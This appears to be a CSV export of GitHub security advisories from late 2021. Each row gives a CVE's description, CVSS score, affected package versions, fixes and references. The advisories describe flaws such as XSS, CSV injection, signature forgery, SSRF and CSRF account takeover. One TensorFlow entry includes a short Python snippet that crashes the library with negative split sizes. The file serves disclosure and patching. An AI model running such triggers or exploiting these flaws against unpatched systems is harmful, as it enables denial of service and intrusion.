+1.4.0,GHSA-hfm8-2q22-h7hv,2021-11-17T21:24:36Z,2021-11-15T17:39:18Z,,['CVE-2021-43561'],Cross-site Scripting in pegasus/google-for-jobs,An XSS issue was discovered in the google_for_jobs (aka Google for Jobs) extension before 1.5.1 and 2.x before 2.1.1 for TYPO3. The extension fails to properly encode user input for output in HTML context. A TYPO3 backend user account is required to exploit the vulnerability.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pegasus/google-for-jobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'pegasus/google-for-jobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43561'}, {'type': 'PACKAGE', 'url': 'https://github.com/pegasuswerbeagentur/google_for_jobs'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2021-015'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-12T19:44:37Z', 'nvd_published_at': '2021-11-10T15:15:00Z'}"
+1.4.0,GHSA-2xhg-w2g5-w95x,2021-12-06T21:36:47Z,2021-11-24T21:01:23Z,,['CVE-2021-41270'],CSV Injection in symfony/serializer,"Description
+-----------
+
+CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program opens a CSV, any cell starting with `=` is interpreted by the software as a formula and could be abused by an attacker.
+
+In Symfony 4.1, we've added the opt-in `csv_escape_formulas` option in `CsvEncoder`, to prefix all cells starting by `=`, `+`, `-` or `@` by a tab `\t`.
+
+Since then, OWASP added 2 chars in that list:
+- Tab (0x09)
+- Carriage return (0x0D)
+
+This makes our previous prefix char (Tab `\t`) part of the vulnerable characters, and [OWASP suggests](https://owasp.org/www-community/attacks/CSV_Injection) using the single quote `'` for prefixing the value.
+
+Resolution
+----------
+
+Symfony now follows the OWASP recommendations and use the single quote `'` to prefix formulas and adds the prefix to cells starting by `\t`, `\r` as well as `=`, `+`, `-` and `@`.
+
+The patch for this issue is available [here](https://github.com/symfony/symfony/commit/3da6f2d45e7536ccb2a26f52fbaf340917e208a8) for branch 4.4.
+
+Credits
+-------
+
+We would like to thank Jake Barwell for reporting the issue and Jérémy Derussé for fixing the issue.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'symfony/serializer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.3.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/serializer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.4.35'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/symfony/symfony/security/advisories/GHSA-2xhg-w2g5-w95x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41270'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/pull/44243'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/commit/3da6f2d45e7536ccb2a26f52fbaf340917e208a8'}, {'type': 'PACKAGE', 'url': 'https://github.com/symfony/symfony'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/releases/tag/v5.3.12'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3BPT4SF6SIXFMZARDWED5T32J7JEH3EP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QSREFD2TJT5LWKM6S4MD3W26NQQ5WJUP/'}]","{'cwe_ids': ['CWE-1236'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-24T20:04:02Z', 'nvd_published_at': '2021-11-24T19:15:00Z'}"
+1.4.0,GHSA-743r-5g92-5vgf,2021-12-03T15:20:59Z,2021-11-24T21:11:16Z,,['CVE-2021-40829'],Improper certificate management in AWS IoT Device SDK v2,"Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.4.2), Python (versions prior to 1.6.1), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.3) did not verify server certificate hostname during TLS handshake when overriding Certificate Authorities (CA) in their trust stores on MacOS. This issue has been addressed in aws-c-io submodule versions 0.10.5 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.4.2 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on macOS. Amazon Web Services AWS-C-IO 0.10.4 on macOS.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'aws-iot-device-sdk-v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'awsiotsdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40829'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-cpp-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-java-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-java-v2/commits/v1.4.2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-js-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-python-v2'}, {'type': 'WEB', 'url': 'https://github.com/awslabs/aws-c-io/'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-24T20:31:36Z', 'nvd_published_at': '2021-11-23T00:15:00Z'}"
+1.4.0,GHSA-q9q6-f556-gpm7,2021-11-15T14:44:13Z,2021-11-10T20:58:42Z,,['CVE-2021-43571'],Improper Verification of Cryptographic Signature in starkbank-ecdsa,"The verify function in the Stark Bank Node.js ECDSA library (ecdsa-node) 1.1.2 fails to check that the signature is non-zero, which allows attackers to forge signatures on arbitrary messages.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'starkbank-ecdsa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43571'}, {'type': 'PACKAGE', 'url': 'https://github.com/starkbank/ecdsa-node'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-node/releases/tag/v1.1.3'}, {'type': 'WEB', 'url': 'https://research.nccgroup.com/2021/11/08/technical-advisory-arbitrary-signature-forgery-in-stark-bank-ecdsa-libraries/'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:27:14Z', 'nvd_published_at': '2021-11-09T22:15:00Z'}"
+1.4.0,GHSA-86fh-j58m-7pf5,2021-11-22T19:04:02Z,2021-11-23T17:57:14Z,,['CVE-2021-36372'],Improper Privilege Management in Apache Ozone,"In Apache Ozone versions prior to 1.2.0, Initially generated block tokens are persisted to the metadata database and can be retrieved with authenticated users with permission to the key. Authenticated users may use them even after access is revoked.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ozone:ozone-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36372'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3C5029c1ac-4685-8492-e3cb-ab48c5c370cf%40apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/19/1'}]","{'cwe_ids': ['CWE-273'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T19:04:02Z', 'nvd_published_at': '2021-11-19T10:15:00Z'}"
+1.4.0,GHSA-33xh-xch9-p6hj,2021-11-22T18:36:47Z,2021-11-23T18:17:59Z,,['CVE-2021-39233'],Incorrect Authorization in Apache Ozone,"In Apache Ozone versions prior to 1.2.0, Container related Datanode requests of Ozone Datanode were not properly authorized and can be called by any client.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ozone:ozone-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39233'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3C394a9a73-44dd-b5db-84d8-607c3226eb00%40apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/19/4'}]","{'cwe_ids': ['CWE-863'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:36:47Z', 'nvd_published_at': '2021-11-19T10:15:00Z'}"
+1.4.0,GHSA-4999-659w-mq36,2021-11-15T20:27:39Z,2021-11-15T23:16:49Z,,['CVE-2021-41266'],Authentication bypass issue in the Operator Console,"During an internal security audit, we detected an authentication bypass issue in the Operator Console when an external IDP is enabled. The security issue has been reported internally. We have not observed this exploit in the wild or reported elsewhere in the community at large. All users are advised to upgrade ASAP.
+
+### Impact
+
+All users on release v0.12.2 and before are affected.
+
+### Patches
+
+This issue was fixed by PR https://github.com/minio/console/pull/1217, users should upgrade to latest release.
+
+### Workarounds
+
+Add `automountServiceAccountToken: false` to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the `CONSOLE_IDP_URL`, `CONSOLE_IDP_CLIENT_ID`, `CONSOLE_IDP_SECRET` and `CONSOLE_IDP_CALLBACK` environment variable and instead use the Kubernetes service account token.
+
+### References
+
+#1217 for more information on the fix and how it was fixed.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [console issues](https://github.com/minio/console/issues)
+* Email us at [security@minio.io](mailto:security@minio.io)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/minio/console'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41266'}, {'type': 'WEB', 'url': 'https://github.com/minio/console/pull/1217'}, {'type': 'PACKAGE', 'url': 'https://github.com/minio/console'}]","{'cwe_ids': ['CWE-306'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T20:27:39Z', 'nvd_published_at': '2021-11-15T21:15:00Z'}"
+1.4.0,GHSA-7r94-xv9v-63jw,2021-11-08T21:53:17Z,2021-11-10T18:44:11Z,,['CVE-2021-41225'],A use of uninitialized value vulnerability in Tensorflow,"### Impact
+TensorFlow's Grappler optimizer has a [use of unitialized variable](https://github.com/tensorflow/tensorflow/blob/3457a2b122e50b4d44ceaaed5a663d635e5c22df/tensorflow/core/grappler/optimizers/auto_parallel.cc#L155-L164):
+
+```cc
+ const NodeDef* dequeue_node;
+ for (const auto& train_node : train_nodes) {
+ if (IsDequeueOp(*train_node)) {
+ dequeue_node = train_node;
+ break;
+ }
+ }
+
+ if (dequeue_node) {
+ ...
+ }
+```
+
+If the `train_nodes` vector (obtained from the saved model that gets optimized) does not contain a `Dequeue` node, then `dequeue_node` is left unitialized.
+
+### Patches
+We have patched the issue in GitHub commit [68867bf01239d9e1048f98cbad185bf4761bedd3](https://github.com/tensorflow/tensorflow/commit/68867bf01239d9e1048f98cbad185bf4761bedd3).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by Qian Feng from Baidu Security Team.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-7r94-xv9v-63jw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41225'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/68867bf01239d9e1048f98cbad185bf4761bedd3'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-908'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:53:17Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}"
+1.4.0,GHSA-r496-7hgp-53wf,2022-05-04T03:45:56Z,2021-11-02T15:42:24Z,,['CVE-2020-36377'],Vulnerability in dump function leads to arbitrary code execution via filePath parameters,"aaptjs is a node wraper for aapt. An issue was discovered in the dump function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'aaptjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36377'}, {'type': 'WEB', 'url': 'https://github.com/shenzhim/aaptjs/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/shenzhim/aaptjs'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T19:20:42Z', 'nvd_published_at': '2021-10-31T20:15:00Z'}"
+1.4.0,GHSA-gp2f-254m-rh32,2021-11-08T21:31:39Z,2021-11-10T16:51:41Z,,['CVE-2021-41251'],Unauthorized access to data in @sap-cloud-sdk/core,"### Impact
+This affects applications on SAP Business Technology Platform that use the SAP Cloud SDK and enabled caching of destinations.
+In some cases, when user information was missing, destinations were cached without user information, allowing other users to retrieve the same destination with its permissions.
+By default, destination caching is disabled. If it is enabled the maximum lifetime is 5 minutes which limits the attack vector.
+
+### Patches
+The problem was fixed by #1769 and #1770. The security for caching has been increased. The changes are released in version 1.52.0.
+
+### Workarounds
+Disable destination caching (it is disabled by default).
+
+### References
+[destination cache API docs](https://sap.github.io/cloud-sdk/api/1.51.0/modules/sap_cloud_sdk_core#destinationCache)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in https://github.com/SAP/cloud-sdk-js","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@sap-cloud-sdk/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.52.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/SAP/cloud-sdk-js/security/advisories/GHSA-gp2f-254m-rh32'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41251'}, {'type': 'WEB', 'url': 'https://github.com/SAP/cloud-sdk-js/pull/1769'}, {'type': 'WEB', 'url': 'https://github.com/SAP/cloud-sdk-js/pull/1770'}, {'type': 'PACKAGE', 'url': 'https://github.com/SAP/cloud-sdk-js'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:31:39Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}"
+1.4.0,GHSA-mcxr-fx5f-96qq,2021-11-22T18:30:27Z,2021-11-23T18:18:35Z,,['CVE-2021-22969'],Server-Side Request Forgery in Concrete CMS,Concrete CMS (formerly concrete5) versions below 8.5.7 has a SSRF mitigation bypass using DNS Rebind attack giving an attacker the ability to fetch cloud IAAS (ex AWS) IAM keys.To fix this Concrete CMS no longer allows downloads from the local network and specifies the validated IP when downloading rather than relying on DNS.Discoverer.,[],"[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22969'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1369312'}, {'type': 'WEB', 'url': 'https://documentation.concretecms.org/developers/introduction/version-history/857-release-notes'}]","{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:30:27Z', 'nvd_published_at': '2021-11-19T19:15:00Z'}"
+1.4.0,GHSA-xm34-v85h-9pg2,2021-11-17T19:57:48Z,2021-11-18T20:09:32Z,,['CVE-2021-41274'],Authentication Bypass by CSRF Weakness,"### Impact
+CSRF vulnerability that allows user account takeover.
+
+All applications using any version of the frontend component of `solidus_auth_devise` are affected if `protect_from_forgery` method is both:
+- Executed whether as:
+ - A `before_action` callback (the default)
+ - A `prepend_before_action` (option `prepend: true` given) before the `:load_object` hook in `Spree::UserController` (most likely order to find).
+- Configured to use `:null_session` or `:reset_session` strategies (`:null_session` is the default in case the no strategy is given, but `rails --new` generated skeleton use `:exception`).
+
+That means that applications that haven't been configured differently from what it's generated with Rails aren't affected.
+
+### Patches
+Users should promptly update to `solidus_auth_devise` version `2.5.4`.
+
+### Workarounds
+A couple of options:
+
+- If possible, change your strategy to `:exception`:
+ ```ruby
+ class ApplicationController < ActionController::Base
+ protect_from_forgery with: :exception
+ end
+ ```
+
+- Add the following to `config/application.rb` to at least run the `:exception` strategy on the affected controller:
+ ```ruby
+ config.after_initialize do
+ Spree::UsersController.protect_from_forgery with: :exception
+ end
+ ```
+
+- We've also released new Solidus versions monkey patching `solidus_auth_devise` with the quick fix. Those versions are `v3.1.3`, `v.3.0.3` & `v2.11.12`. See [GHSA-5629-8855-gf4g](https://github.com/solidusio/solidus/security/advisories/GHSA-5629-8855-gf4g) for details.
+
+### References
+- [CSRF on the Rails guides](https://guides.rubyonrails.org/security.html#cross-site-request-forgery-csrf)
+- [Solidus security](https://solidus.io/security/)
+
+### Thanks
+We'd like to thank [vampire000](https://hackerone.com/vampire000) for reporting this issue.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [solidus_auth_devise](https://github.com/solidusio/solidus_auth_devise/issues) or a discussion in [solidus](https://github.com/solidusio/solidus/discussions)
+* Email us at [security@solidus.io](mailto:security@soliidus.io)
+* Contact the core team on [Slack](http://slack.solidus.io/)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'solidus_auth_devise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '2.5.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41274'}, {'type': 'WEB', 'url': 'https://github.com/solidusio/solidus_auth_devise/commit/731a6645e90ea9fd228f78ec53c6976c048a0555'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/solidus_auth_devise/CVE-2021-41274.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/solidusio/solidus_auth_devise'}, {'type': 'WEB', 'url': 'https://github.com/solidusio/solidus_auth_devise/releases/tag/v2.5.4'}]","{'cwe_ids': ['CWE-352'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T19:57:48Z', 'nvd_published_at': '2021-11-17T20:15:00Z'}"
+1.4.0,GHSA-cpf4-wx82-gxp6,2021-11-08T21:59:15Z,2021-11-10T18:48:15Z,,['CVE-2021-41222'],Segfault due to negative splits in `SplitV`,"### Impact
+The [implementation](https://github.com/tensorflow/tensorflow/blob/e71b86d47f8bc1816bf54d7bddc4170e47670b97/tensorflow/core/kernels/split_v_op.cc#L49-L205) of `SplitV` can trigger a segfault is an attacker supplies negative arguments:
+
+```python
+import tensorflow as tf
+
+tf.raw_ops.SplitV(
+ value=tf.constant([]),
+ size_splits=[-1, -2]
+ ,axis=0,
+ num_split=2)
+```
+
+This occurs whenever `size_splits` contains more than one value and at least one value is negative.
+
+### Patches
+We have patched the issue in GitHub commit [25d622ffc432acc736b14ca3904177579e733cc6](https://github.com/tensorflow/tensorflow/commit/25d622ffc432acc736b14ca3904177579e733cc6).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cpf4-wx82-gxp6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41222'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/25d622ffc432acc736b14ca3904177579e733cc6'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-682'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:59:15Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}"
+1.4.0,GHSA-fwf6-rw69-hhj4,2021-12-01T14:33:13Z,2021-11-30T22:22:16Z,,['CVE-2021-23654'],Improper Neutralization of Formula Elements in a CSV File in html-2-csv,"This affects all versions of package html-to-csv. When there is a formula embedded in a HTML page, it gets accepted without any validation and the same would be pushed while converting it into a CSV file. Through this a malicious actor can embed or generate a malicious link or execute commands via CSV files.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'html-to-csv'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23654'}, {'type': 'WEB', 'url': 'https://github.com/hanwentao/html2csv/issues/9'}, {'type': 'PACKAGE', 'url': 'https://github.com/hanwentao/html2csv'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-HTMLTOCSV-1582784'}]","{'cwe_ids': ['CWE-1236'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-29T20:28:01Z', 'nvd_published_at': '2021-11-26T20:15:00Z'}"
+1.4.0,GHSA-c8cw-2c5j-xff3,2021-11-22T19:05:51Z,2021-11-23T17:56:30Z,,['CVE-2021-39234'],Incorrect Authorization in Apache Ozone,"In Apache Ozone versions prior to 1.2.0, Authenticated users knowing the ID of an existing block can craft specific request allowing access those blocks, bypassing other security checks like ACL.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ozone:ozone-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39234'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3C97d65498-7f8c-366f-1bea-5a74b6378f0d%40apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/19/5'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T19:05:51Z', 'nvd_published_at': '2021-11-19T10:15:00Z'}"
